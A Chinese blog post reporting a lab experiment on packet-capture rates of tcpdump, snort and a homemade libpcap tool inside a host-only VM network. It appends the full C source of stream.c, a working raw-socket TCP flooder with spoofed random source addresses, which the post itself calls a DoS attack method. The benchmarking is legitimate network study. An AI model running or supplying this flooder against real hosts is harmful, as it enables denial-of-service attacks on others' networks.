frido123
frido123

关于高效的数据包捕获实验(1)

昨天心血来潮翻译了一篇长长的外文,真累,以后真是懒得翻译了,自己英语也一般,翻译出来错误估计也较多,还不利于读者学英语。
    不过昨天那片关于如何提高被动数据包的捕获的效率的文章,那些实验数据还是比较值得关注的,看了才知道原来网络上的包那么容易丢啊。
    当然它的测试是通过外部计算机发数据包,对接收者的测试。
    我为了简单,对发送者进行了一些初步测试,对在发送端进行数据包的捕获,我简单的测试了几下发现捕获率100%,我想原因是对于发的包,必须经过内核所以能被100%的捕获,而对于接受方则不一样,因为接受方的缓冲区满了,就要丢包了,而发包程序是个单线程的,使用的是sendto函数,查看手册sendto默认是阻塞调用,所以捕获率是100%,至于接受方的捕获率我还没有真正测试呢,看那篇翻译文章所说应该是很低。
 
    下面是我的这个实验
mysnort是我自己写的一个程序,本来是这个学期的作业要交的报告,我也连它一块测试,以辨优劣。当然现在代码只是简单的抓包,在这个实验我把包的分析直接return了,也就是没有分析,测试一下libpcap的抓包率会不会受程序处理速度的影响,很明显是受的,也就给了我要用多线程改写这个程序提供了依据。因为snort,tcpdump都是基于libpcap的,我也使用了libpcap,因为我写程序的时候还只知道这个库,libpcap-mmap还有那个PF_RING听都没有听说过。不过我想抓包的部分是可修改的。因为不论用那个库,抓的包是没有变的,只是准确不准确而已。
 

实验目的:分析snorttcpdumpmysnort的运行效果。

实验步骤:

数据包构造,这里采用了stream.c,一种Dos攻击方式发大量的数据包。后附stream.c的代码。

网络环境:

采用host-only方式和主机通讯,抗外界干扰能力强。内装操作系统ubuntu,主机windows xp

 

Xp:本地连接静态ip 192.168.1.2 子网掩码255.255.255.0 默认网关192.168.1.1(路由器)

本地连接共享上网给VMware Network Adapter VMnet1这一虚拟网卡。

VMnet1 静态ip:192.168.0.1 子网掩码255.255.255.0

 

Ubuntu 静态ip: 192.168.0.2 子网掩码255.255.255.0 默认网关 192.168.0.1 dns 61.139.2.69

实验步骤:

Gcc stream.c      //生成./a.out

运行下面三个程序准备侦听

tcpdump -vv tcp and dst host 192.168.0.1

snort -v tcp and dst host 192.168.0.1

./mysnort    //这个的命令行格式还没有做,只有在代码里修改了重新编译运行即可。

然后运行发包程序

./a.out 192.168.0.1 0 0 1

然后CTRL+C结束发包程序,然后CTRL+C结束其他三个监测程序,再结束snort的时候,它没有响应,要给它再发个包,它才退出,这是个小错误,我用的snort版本是2.7.0,ubuntu的源里面没有2.8的,所以就装了2.7.0的将就测试了。

实验结果:

500)this.width=500;" border=0>
 

图一 Stream.c 构造了57285个数据包,由于要停止snort捕获数据包时,无法中断SIGINT,所以又进行了一次发包,这样子snort就会再处理一个包,然后处理中断SIGINT,这样子snort就捕获了57286个包。Snort捕获的数据包多一个就是这个原因。

 

 

500)this.width=500;" border=0>
图二 snort的抓包及处理效果
 
500)this.width=500;" border=0>
图三 tcpdump
由以上数据得

Packets send

by stream.c is 57285(+1)

 

software

received

droped

analyzed

tcpdump

57285

56919

4

snort

57285(+1)

36227

21058

mysnort

57285

0

0
 
表一 mysnort是自己测试用得,只进行抓包不进行包得任何处理               

 

为了显示snort的数据必须在对他发出SIGINT后多发一个包才能退出它,并显示统计信息。

从上表可以知道:

他们三个都收到了发出去的全部数据包,这是由于数据包是从本机发出去的,所以必须经过内核,这样就都能被libpcap捕获到。

Tcpdump只分析了4个包,丢掉了56919个包,还有366个包不知道跑哪去了。可能是在缓冲区中,没来得及分析,而由于缓冲区满了导致其他的数据包都被丢弃。说明了tcpdump的效果极差。

对于snort分析率36.759%,丢包率63.239%,明显可知snort的分析效果还有待改进。

而对于mysnort分析率为0,丢包率为0,也就是说对libpcap的包未做分析所以没有出现丢包现象。

这说明了只要分析的速度够快,丢包率就不会那么高,而且对于snort来说,我选取的模式还没有进行规则匹配,如果再进行规则匹配,那么丢包率或许会更可观。

      //stream.c代码,略做修改能够在退出时打印发的包的数目,源码出处是: http://www.securiteam.com/unixfocus/5YP0I000DG.html
 

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <signal.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __FAVOR_BSD
#define __FAVOR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int num=0;
struct ip_hdr {
    u_int ip_hl:4, /* header length in 32 bit words */
    ip_v:4; /* ip version */
    u_char ip_tos; /* type of service */
    u_short ip_len; /* total packet length */
    u_short ip_id; /* identification */
    u_short ip_off; /* fragment offset */
    u_char ip_ttl; /* time to live */
    u_char ip_p; /* protocol */
    u_short ip_sum; /* ip checksum */
    u_long saddr, daddr; /* source and dest address */
};

struct tcp_hdr {
    u_short th_sport; /* source port */
    u_short th_dport; /* destination port */
    u_long th_seq; /* sequence number */
    u_long th_ack; /* acknowledgement number */
    u_int th_x2:4, /* unused */
    th_off:4; /* data offset */
    u_char th_flags; /* flags field */
    u_short th_win; /* window size */
    u_short th_sum; /* tcp checksum */
    u_short th_urp; /* urgent pointer */
};

struct tcpopt_hdr {
    u_char type; /* type */
    u_char len; /* length */
    u_short value; /* value */
};

struct pseudo_hdr { /* See RFC 793 Pseudo Header */
    u_long saddr, daddr; /* source and dest address */
    u_char mbz, ptcl; /* zero and protocol */
    u_short tcpl; /* tcp length */
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
/* struct tcpopt_hdr opt; */
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s \n", progname);
    fprintf(stderr, " dstaddr - the target we are trying to attack.\n");
    fprintf(stderr, " dstport - the port of the target, 0 = random.\n");
    fprintf(stderr, " pktsize - the extra size to use. 0 = normal syn.\n");
    exit(1);
}

/* This is a reference internet checksum implimentation, not very fast */
inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

     /* Our algorithm is simple, using a 32 bit accumulator (sum), we add
      * sequential 16 bit words to it, and at the end, fold back all the
      * carry bits from the top 16 bits into the lower 16 bits. */

     while (nleft > 1) {
         sum += *w++;
         nleft -= 2;
     }

     /* mop up an odd byte, if necessary */
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }

     /* add back carry outs from top 16 bits to low 16 bits */
     sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
     sum += (sum >> 16); /* add carry */
     answer = ~sum; /* truncate to 16 bits */
     return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s.\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}

void flooder(void)
{
    struct timespec ts;
    int i;

    memset(&packet, 0, sizeof(packet));

    ts.tv_sec = 0;
    ts.tv_nsec = 10;

    packet.ip.ip_hl = 5;
    packet.ip.ip_v = 4;
    packet.ip.ip_p = IPPROTO_TCP;
    packet.ip.ip_tos = 0x08;
    packet.ip.ip_id = rand();
    packet.ip.ip_len = FIX(sizeof(packet));
    packet.ip.ip_off = 0; /* IP_DF? */
    packet.ip.ip_ttl = 255;
    packet.ip.ip_dst.s_addr = dstaddr;

    packet.tcp.th_flags = 0;
    packet.tcp.th_win = htons(16384);
    packet.tcp.th_seq = random();
    packet.tcp.th_ack = 0;
    packet.tcp.th_off = 5; /* 5 */
    packet.tcp.th_urp = 0;
    packet.tcp.th_sport = rand();
    packet.tcp.th_dport = dstport?htons(dstport):rand();

/*
    packet.opt.type = 0x02;
    packet.opt.len = 0x04;
    packet.opt.value = htons(1460);
*/


    cksum.pseudo.daddr = dstaddr;
    cksum.pseudo.mbz = 0;
    cksum.pseudo.ptcl = IPPROTO_TCP;
    cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));

    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = dstaddr;
    s_in.sin_port = packet.tcp.th_dport;

    for(i=0;;++i) {
    cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random();
       ++packet.ip.ip_id;
       ++packet.tcp.th_sport;
       ++packet.tcp.th_seq;

       if (!dstport)
          s_in.sin_port = packet.tcp.th_dport = rand();

       packet.ip.ip_sum = 0;
       packet.tcp.th_sum = 0;

       cksum.tcp = packet.tcp;

       packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
       packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
     num++;
       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0)
          perror("jess");
        

    }
}
void nice_exit(int signal);
int main(int argc, char *argv[])
{
    signal(SIGINT,nice_exit);
    int on = 1;

    printf("stream.c v1.0 - TCP Packet Storm\n");

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
       perror("setsockopt");
       exit(1);
    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nResolving IPs..."); fflush(stdout);

    dstaddr = lookup(argv[1]);
    dstport = atoi(argv[2]);
    pktsize = atoi(argv[3]);

    printf("Sending..."); fflush(stdout);

    flooder();
    
    return 0;
}
void nice_exit(int signal)
{
    printf("%d packets send!\n",num);
    exit(0);
}
阅读(859) | 评论(1) | 转发(0) |
0

上一篇:怎么学习编程

下一篇:关于高效的数据包捕获实验(2)

相关热门文章
  • Hadoop初探之Hadoop生态圈...
  • GE管理培训生与国际知名品牌...
  • ge公司招聘助力中国智能电网...
  • GE公司发展城市轨道交通...
  • GE发动机与重庆机电控股集团签...
  • "没有找到COMRes.dll,应用程...
  • 如何给文件夹设置密码?...
  • 免费使用正版卡巴斯基-最新key...
  • 卡巴斯基激活码
  • 最新PUBWIN2007破解(QQ讨论群:...
  • ChinaUnix & ITPUB社区12周年...
  • ssh连接出现以下提示,求解...
  • 如何扩展MYSQL
  • 准备做一个大型门户,用户什么...
  • gbk or utf8
给主人留下些什么吧!~~

zuii2008-08-19 14:01:53

用虚拟网卡测试可能是比不同主机发送数据要好很多~五万个包也不是很多

回复 | 举报
评论热议

你可能感兴趣的:(网络与安全)

  • 虚拟化环境中如何实现以业务为中心的网络隔离?Everoute 推出虚拟专有云网络(VPC)功能 志凌海纳SmartX 超融合网络虚拟专有云网络(VPC)虚拟化VPC架构
    目前,不少企业都利用云计算和虚拟化技术提升IT系统灵活性、敏捷性和成本效益。然而,云环境的“多租户”特性也为业务安全带来了新的挑战,如何保障不同业务主体或租户之间的数据安全和网络隔离,成为企业关注的焦点。作为SmartX软件定义的网络与安全产品,Everoute3.0.0版本中引入了虚拟专有云网络(VPC)功能,为企业云网络提供更细致的安全隔离能力,搭配原有的分布式防火墙、负载均衡、网络流量可视化
  • IT行业有哪些证书含金量高? 鸥梨菌Honevid 创作活动深度学习
    IT行业有哪些证书含金量高?在IT行业,拥有含金量高的证书是职业发展的关键,欢迎交流讨论,快来在评论区分享你心中IT行业最重要的证书吧~IT行业证书的价值与作用在IT行业,证书不仅仅是一纸凭证,更是对个人专业技能和知识水平的认可。它们通常分为几大类:编程与开发类、网络与安全类、数据库与运维类、项目管理类等。这些证书的价值主要体现在以下几个方面:技能证明:证书是对个人在某个领域专业技能的证明,它能够
  • Linux nextcloud 个人网盘部署 初学c++ linux运维服务器学习
    Linuxnextcloud个人网盘部署一级目录二级目录三级目录1.安装nextcloud2.配置nextcloud3.网络与安全设置3.1修改个人服务器nextcloud的服务端口3.2防火墙3.3配置信任域方式一:通过命令添加单个ip到信任域方式二:编辑配置文件,取消信任域限制(允许任意ip访问)3.4ipv6访问3.5域名访问一级目录二级目录三级目录云服务器、家庭服务器部署nextcloud
  • 金融行业专题|证券超融合架构转型与场景探索合集(2023版) 志凌海纳SmartX 金融架构超融合
    更新内容更新SmartX超融合在证券行业的覆盖范围、部署规模与应用场景。新增操作系统信创转型、Nutanix国产化替代、网络与安全等场景实践。更多超融合金融核心生产业务场景实践,欢迎阅读文末电子书。在金融行业如火如荼的数字化转型大潮中,传统架构向软件定义、分布式架构和按需服务的云化转型已成为大势所趋,对关键技术国产化、自主可控的信创转型需求也越来越明确。目前已有许多金融用户完成了云化转型,并率先试
  • 浏览器推荐:从技术与体验角度的深入探讨 球球不吃虾 随笔edge前端javascript
    文章目录浏览器推荐:从技术与体验角度的深入探讨主流浏览器概览1.Chrome2.Firefox3.Safari4.Edge5.其他浏览器浏览器技术差异渲染引擎JavaScript引擎网络与安全性浏览器速度与性能基准测试实际使用开发者友好性开发者工具扩展与插件开发者社区与资源选择建议最后浏览器推荐:从技术与体验角度的深入探讨在现代Web开发中,浏览器是开发者最直接的工作环境,同时也是用户体验的关键环
  • SmartX 超融合 5.1 版本有哪些新特性和技术提升? 志凌海纳SmartX 云计算超融合
    近日,SmartX正式发布了超融合产品组合SmartXHCI5.1版本,以全面升级的超融合软件、分布式块存储、容器管理与服务、软件定义的网络与安全等组件,为虚拟化和容器负载在计算、存储、网络和管理层面提供统一的架构和生产级别的能力支持。本期,我们将为您盘点SmartXHCI5.1重点特性与技术创新,帮助企业用户更好地利用SmartX超融合提升业务价值。超融合软件SMTXOS:更出色的生产级可靠性与
  • SASE:网络与安全的未来之路 海域云赵从友 网络安全
    随着数字化时代的到来,企业和个人对网络连接和安全性的需求日益增长。传统的网络架构已经无法满足这些需求,因此,新兴的网络和安全框架SASE(SecureAccessServiceEdge)应运而生。本文将介绍什么是SASE,并探讨为何SASE会如此受欢迎。SASE是一种新兴的网络和安全架构,它通过将网络连接和安全性相结合,为用户提供一个统一的、灵活的、安全的网络环境。SASE的核心理念是将网络和安全
  • Fortinet Universal SASE能力再度进化!保障用户访问任意应用程序便捷无忧 Fortinet_CHINA 网络服务器运维
    近日,专注网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT)宣布,已进一步扩展旗下UniversalSASE解决方案功能,通过无处不达的统一操作系统FortiOS,助力混合办公模式用户实现随时随地安全高效的网络访问。FortinetUniversalSASE解决方案功能扩展单一供应商SASE解决方案可为用户和设备提供针对关键资源和应用程序的灵活访问。然而,多数企业往往部
  • Kali Linux:网络与安全专家的终极武器 程序边界 安全linux网络
    文章目录一、KaliLinux简介二、KaliLinux的优势三、使用KaliLinux进行安全任务推荐阅读——《KaliLinux高级渗透测试》适读人群内容简介作者简介目录KaliLinux:网络与安全专家的终极武器KaliLinux,对于许多网络和安全专业人士来说,这是一个无人不知、无人不晓的名字。它是专为网络和安全测试、渗透测试以及数字取证等任务而设计的强大操作系统。本篇文章将深入介绍Kal
  • Fortinet 聚焦核心业务增长领域,巩固网安市场领导地位,持续推动行业创新 CSDN云计算 云原生
    近日,专注于推动网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT)发布第三季度财报。同期,Fortinet做出重大战略宣布,未来将重点聚焦高速增长的差异化市场。Fortinet将紧紧围绕安全组网、UniversalSASE和安全运营三大细分市场推进产品研发(R&D)和产品推广(GTM)战略布局。这一举措进一步强调并重申了Fortinet致力于为用户提供高价值产品和服务并
  • 稳步增长 持续创新 | Fortinet发布2023第三季度财报 CSDN云计算 网络大数据运维
    全球网络与安全融合领域领导者Fortinet(Nasdaq:FTNT),于近日公布2023年第三季度财报。Fortinet创始人、董事长兼首席执行官谢青表示:历经两年强劲增长后,安全组网市场的产品需求趋于平稳,增速已逐渐放缓。为积极应对这一市场信号,Fortinet正充分利用全球规模和技术优势、产品推广能力以及专业知识和技能,将业务重点聚焦增速更快的SASE(安全访问服务边缘)和SecurityO
  • Fortinet:行走在网络和安全融合领域的最前列 CSDN云计算 资讯网络安全人工智能
    近日,Fortinet核心操作系统的演进暨FortinetSD-WAN在2021年度Gartner广域网边缘基础设施魔力象限的位置及其关键能力与场景宣讲成功举办。会议指出,在数字化转型过程中,攻击平面成倍增长、边缘无处不在,没有“安全”的“网络”已经无法立足,网络与安全的融合已经成为一种新常态。Fortinet以“安全驱动网络”的思维,打造安全动态协同能力解决方案,帮助企业真正实现数字化安全。安全
  • Fortinet数据中心防火墙及服务ROI超300%!Forrester TEI研究发布 Fortinet_CHINA 网络安全
    近日,专注网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT)联合全球知名分析机构Forrester发布总体经济影响独立分析报告,详细阐述了在企业数据中心部署FortiGate下一代防火墙(NGFW)和FortiGuardAI驱动安全服务,助力企业三年内实现超300%的投资回报率(ROI),六个月内收回全部投资,快速实现成本节约及业务效益提升。ForresterTEI研究
  • 成果喜人 增速稳健丨Fortinet 谢青谈行业发展趋势与企业强劲增长驱动力 Fortinet_CHINA 网络web安全安全
    引言随着时间进入到2023年第三季度末,Gartner、Forrester、ESG等全球权威咨询机构已相继发布UniversalZTNA、ZTE、OT安全等相关研究报告,2023年网络安全行业趋势渐趋明朗。同时,在这些相关报告中,作为创立二十余载,始终致力于推动网络安全行业发展及网络与安全融合的Fortinet都得到了高度认可。谢青(KenXie)Fortinet创始人董事会主席首席执行官近期,F
  • asw ec2 ssh 登录设置 only火车头 ssh运维
    使用ssh登录awsec2主机,需要创建密钥对,设置好安全组规则。密钥对ec2->网络与安全->密钥对->创建密钥对名称:[输入一个名称]创建密钥对浏览器会下载一个后缀为.pem的文件,使用ssh时将会用到。安全组设置入站规则ec2->网络与安全->安全组->入站规则->编辑入站规则->添加规则类型:ssh源:自定义源右边一个框:CIDR数据块0.0.0.0/0保存规则出站规则ec2->安全组->
  • VMware Explore 大会发布重磅云上技术之外,VMware 有哪些前沿探索? CSDN云计算 云原生云计算VMwareVMwareExplore区块链量子安全算法Harbor
    编辑|宋慧出品|CSDN云计算最近,VMware举办了年度技术大会VMwareExplore,重磅发布了其在多云趋势下的多个技术产品组合,包含了云基础架构、云原生、网络与安全、远程混合办公等等。不过,在这些优势领域的产品之外,VMware高级副总裁兼首席技术官KitColbert也在大会期间,向媒体发布了一系列创新和孵化项目,涵盖了开源容器、区块链、量子计算安全、低碳。VMware高级副总裁兼首席
  • 记录一次阿里云服务器ECS上启动的portainer无法访问的问题 一个有梦想的Java程序员 linux上部署项目运行环境服务器阿里云运维
    如下图,在阿里云ECS服务器上安装并启动了portainer,但是在自己电脑上访问不了远程的portainer。最后发现是要在网络安全组里开放9000端口号,具体操作如下:在云服务器管理控制台点击左侧菜单中的网络与安全-安全组,然后点击安全组右边操作栏的【管理规则】按钮点击【手动添加】按钮填写端口信息,点击保存然后再次访问服务器公网IP:9000,已经能访问了
  • Fortinet 2023上半年全球威胁态势研究报告:勒索软件检测成下降趋势,针对性攻击持续升温 CSDN云计算 云计算
    近日,专注于推动网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT),发布《2023上半年全球威胁态势研究报告》。报告显示,2023年上半年勒索软件检出数量继续下降、高级持续性威胁(APT)团体活跃度显著增加以及攻击者使用的MITREATT&CK技术呈现飞速转变等威胁发展趋势。由于恶意行为者所用战术和技术的日益复杂以及针对性攻击的不断升级,目前组织持续处于被动局面。《20
  • VNC Viewer :Timed out waiting for a response from the computer 冰冰的coco 赫赫快乐编程阿里云ubuntu
    阿里云主机,Ubuntu系统,通过VNCviewer连接出现超时问题解决方案:首先检查在阿里云主机添加5801/5810;5901/5910端口是否开启查找步骤如下图:1.点击实例2.点击更多->网络与安全组->安全组配置3.点击配置规则4.在入方向和出方向都手动添加5801/5810;5901/5910端口5.如果添加以后仍然连接超时,再考虑是否为防火墙问题
  • Fortinet独揽OT领导者称号丨Westlands 《Navigator工业网络安全展望报告》发布 CSDN云计算 网络
    专注推动网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT)近日宣布,业内领先的OT安全行业分析和战略公司WestlandsAdvisory(威士兰咨询,以下简称WA),在最新发布的《工业网络安全展望》报告中将Fortinet®评为唯一领导者。数字化背景OT网络安全威胁愈加严峻当前,OT网络面临独特的安全挑战。由于许多OT网络在设计之初并未考虑后续的联网需求,导致众多OT
  • 安全工程师(安全产品售后)岗位需求-徐庆臣(黑客洗白者) 黑客洗白者 网络安全网络安全工程师渗透测试安全服务器网络web安全网络安全运维
    职位描述负责网络安全项目中的产品调试和交付;负责网络安全项目中的技术方案编写;负责客户的安全应急和售后驻场。职位要求具备扎实的计算机与网络原理;熟悉各类网络与安全设备(路由、交换、防火墙、VPN、漏洞扫描);对网络数据包具备分析实践能力,熟练使用数据包分析工具;熟悉常见网络通信协议(TCP/IP、交换路由协议、VPN协议等);熟悉防火墙原理,能够熟练配置防火墙策略;熟悉主流网络与安全厂商产品(思科
  • Fortinet数据中心防火墙及服务ROI超300%,Forrester TEI研究发布 CSDN云计算 云计算
    近日,专注网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT)联合全球知名分析机构Forrester发布总体经济影响独立分析报告,详细阐述了在企业数据中心部署FortiGate下一代防火墙(NGFW)和FortiGuardAI驱动安全服务,助力企业三年内实现超300%的投资回报率(ROI),六个月内收回全部投资,快速实现成本节约及业务效益提升。ForresterTEI研究
  • Fortinet安全专家问答实录|如何防护暴力破解、撞库攻击 Fortinet_CHINA 安全
    黑客攻防,一个看似神秘,但却必不可缺的领域。近期,全球网络与安全融合领域领导者Fortinet(Nasdaq:FTNT),开启了FortinetDEMODAY系列实战攻防演练线上直播,让人人都能零距离观摩黑客是如何“开黑”、破坏,以及Fortinet系列产品是如何进行见招拆招、一一化解的!在第一期中,Fortinet攻防专家团队成员庄喆皓在进行黑客攻防演示后,与在线观众进行了深入的问答互动,以下是
  • SASE:基于数字身份标识的网络与安全访问云服务 零信任Enlink_Young 网络安全
    摘要:企业数字化转型促成了广域网组网与安全技术的深度融合,SASE将SD-WAN与基于数字身份标识的网络安全访问集成于云服务基础设施中,实现了一种能适应当前企业网络流量模型的安全架构,为无处不在的用户、连接、数据和应用提供了便捷、高效、安全的访问服务边缘。本文对SASE的发展背景、关键组件及未来目标进行了梳理、理解和解释。关键字:SASE,零信任,SD-WAN,ZTNA一、SASE的诞生背景伴随云
  • Python自动化网络运维 计算机网络与安全 python自动化网络运维python自动化网络运维华为
    Python自动化网络巡检-使用说明---使用问题及源码获取联系qq378444731--公众号‘计算机网络与安全’正式版包括所有命令,可以实现网络设备配置备份,更改密码,查看信息,修改配置等功能。目前匹配思科、华三、华为、锐捷和迈普部分设备,如果不能自动匹配命令,可以提供程序反馈的a-error-log文件联系我更新程序。第一步:在TXT-to-CSV.txt里填写设备名称、IP、用户名、密码:
  • 2023年全球零信任现状报告发布丨面临集成挑战,如何突破知易行难? Fortinet_CHINA 网络安全
    近日,专注网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT)宣布发布《2023年全球零信任现状报告》及其调查发现。该报告揭示了零信任安全当前部署和实施现状,以及IT团队在应对后疫情时代的混合办公模式的安全防护方面取得的新进展,深入剖析了许多组织在保护混合办公网络环境所面临的持续挑战。零信任成混合办公时代最佳实践随着远程办公、移动办公等在内的混合办公模式的崛起,网络防护需
  • 实战!Fortinet网络与安全融合应对多云挑战 Fortinet_CHINA 安全网络运维安全
    混合云、多云已经成为一种不可逆转的趋势,随之而来的是网络的全面互联,企业对全网可见性、策略一致性、且管理简便等三大需求日益迫切。然而公有云平台的网络服务不支持多云和混合云,多云架构带来多管理界面复杂挑战的同时,且需要企业解决跨云和跨地区连接问题。“与此同时,安全威胁加剧、能力覆盖不足、告警处置疲劳等挑战也使得大多数网络安全人士将目光转向了跨混合云和多云的网络安全融合平台。”在“FortiOS安全无
  • 访问不到阿里云服务器端口 T3165919332 阿里云服务器云计算
    这里前台在主机上然后访问服务器上的node后台一直访问不到不能连入阿里云服务器后台连不上公网ip端口解决方案登录阿里云进入云服务器2、管理控制台3、网络与安全——>安全组4、安全组里面点击配置规则5、手动添加即可
  • 世界环境日丨Fortinet 发布《2022 年可持续发展报告》,践行企业社会责任 CSDN云计算 网络
    致力于推动网络与安全融合的全球网络安全领导者Fortinet®(NASDAQ:FTNT)近日发布《2022年可持续发展报告》,详细介绍并分享了Fortinet在影响自身业务、客户和其他利益相关者的优先可持续发展方面的最新战略进展及发展动向。Fortinet专注研发可持续安全创新技术,积极培养多元化网络安全人才,跨整个价值链促进日常业务的可持续发展,并以此为企业社会责任,践行使命担当。2022年,F
  • 阿里云Redis端口映射 Eve0
    1.云服务器ECS安全组设置网络与安全->安全组->配置规则安全组列表image.png安全组规则->快速添加安全组规则快速添加2.配置文件修改redis.conf中bind修改为0.0.0.0bind0.0.0.0重启redis3.配置防火墙查看防火墙状态systemctlstatusfirewalld[root@serverbin]#systemctlstatusfirewalld●firew
  • java线程的无限循环和退出 3213213333332132 java
    最近想写一个游戏,然后碰到有关线程的问题,网上查了好多资料都没满足。 突然想起了前段时间看的有关线程的视频,于是信手拈来写了一个线程的代码片段。 希望帮助刚学java线程的童鞋 package thread; import java.text.SimpleDateFormat; import java.util.Calendar; import java.util.Date
  • tomcat 容器 BlueSkator tomcatWebservlet
    Tomcat的组成部分 1、server A Server element represents the entire Catalina servlet container. (Singleton) 2、service service包括多个connector以及一个engine,其职责为处理由connector获得的客户请求。   3、connector 一个connector
  • php递归,静态变量,匿名函数使用 dcj3sjt126com PHP递归函数匿名函数静态变量引用传参
      <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <title>Current To-Do List</title> </head> <body>
  • 属性颜色字体变化 周华华 JavaScript
    function changSize(className){ var diva=byId("fot") diva.className=className; } </script> <style type="text/css"> .max{ background: #900; color:#039;
  • 将properties内容放置到map中 g21121 properties
    代码比较简单: private static Map<Object, Object> map; private static Properties p; static { //读取properties文件 InputStream is = XXX.class.getClassLoader().getResourceAsStream("xxx.properti
  • [简单]拼接字符串 53873039oycg 字符串
             工作中遇到需要从Map里面取值拼接字符串的情况,自己写了个,不是很好,欢迎提出更优雅的写法,代码如下:           import java.util.HashMap; import java.uti
  • Struts2学习 云端月影
    最近开始关注struts2的新特性,从这个版本开始,Struts开始使用convention-plugin代替codebehind-plugin来实现struts的零配置。 配置文件精简了,的确是简便了开发过程,但是,我们熟悉的配置突然disappear了,真是一下很不适应。跟着潮流走吧,看看该怎样来搞定convention-plugin。 使用Convention插件,你需要将其JAR文件放
  • Java新手入门的30个基本概念二 aijuans java新手java 入门
    基本概念:  1.OOP中唯一关系的是对象的接口是什么,就像计算机的销售商她不管电源内部结构是怎样的,他只关系能否给你提供电就行了,也就是只要知道can or not而不是how and why.所有的程序是由一定的属性和行为对象组成的,不同的对象的访问通过函数调用来完成,对象间所有的交流都是通过方法调用,通过对封装对象数据,很大限度上提高复用率。  2.OOP中最重要的思想是类,类是模板是蓝图,
  • jedis 简单使用 antlove javarediscachecommandjedis
    jedis.RedisOperationCollection.java package jedis; import org.apache.log4j.Logger; import redis.clients.jedis.Jedis; import java.util.List; import java.util.Map; import java.util.Set; pub
  • PL/SQL的函数和包体的基础 百合不是茶 PL/SQL编程函数包体显示包的具体数据
    由于明天举要上课,所以刚刚将代码敲了一遍PL/SQL的函数和包体的实现(单例模式过几天好好的总结下再发出来);以便明天能更好的学习PL/SQL的循环,今天太累了,所以早点睡觉,明天继续PL/SQL总有一天我会将你永远的记载在心里,,,   函数; 函数:PL/SQL中的函数相当于java中的方法;函数有返回值 定义函数的 --输入姓名找到该姓名的年薪 create or re
  • Mockito(二)--实例篇 bijian1013 持续集成mockito单元测试
            学习了基本知识后,就可以实战了,Mockito的实际使用还是比较麻烦的。因为在实际使用中,最常遇到的就是需要模拟第三方类库的行为。         比如现在有一个类FTPFileTransfer,实现了向FTP传输文件的功能。这个类中使用了a
  • 精通Oracle10编程SQL(7)编写控制结构 bijian1013 oracle数据库plsql
    /* *编写控制结构 */ --条件分支语句 --简单条件判断 DECLARE v_sal NUMBER(6,2); BEGIN select sal into v_sal from emp where lower(ename)=lower('&name'); if v_sal<2000 then update emp set
  • 【Log4j二】Log4j属性文件配置详解 bit1129 log4j
    如下是一个log4j.properties的配置   log4j.rootCategory=INFO, stdout , R log4j.appender.stdout=org.apache.log4j.ConsoleAppender log4j.appender.stdout.layout=org.apache.log4j.PatternLayout log4j.appe
  • java集合排序笔记 白糖_ java
    public class CollectionDemo implements Serializable,Comparable<CollectionDemo>{ private static final long serialVersionUID = -2958090810811192128L; private int id; private String nam
  • java导致linux负载过高的定位方法 ronin47
    定位java进程ID 可以使用top或ps -ef |grep java ![图片描述][1] 根据进程ID找到最消耗资源的java pid 比如第一步找到的进程ID为5431 执行 top -p 5431 -H ![图片描述][2] 打印java栈信息 $ jstack -l 5431 > 5431.log 在栈信息中定位具体问题 将消耗资源的Java PID转
  • 给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数 bylijinnan 函数
    import java.util.ArrayList; import java.util.List; import java.util.Random; public class RandNFromRand5 { /** 题目:给定能随机生成整数1到5的函数,写出能随机生成整数1到7的函数。 解法1: f(k) = (x0-1)*5^0+(x1-
  • PL/SQL Developer保存布局 Kai_Ge
          近日由于项目需要,数据库从DB2迁移到ORCAL,因此数据库连接客户端选择了PL/SQL Developer。由于软件运用不熟悉,造成了很多麻烦,最主要的就是进入后,左边列表有很多选项,自己删除了一些选项卡,布局很满意了,下次进入后又恢复了以前的布局,很是苦恼。在众多PL/SQL Developer使用技巧中找到如下这段:   &n
  • [未来战士计划]超能查派[剧透,慎入] comsci 计划
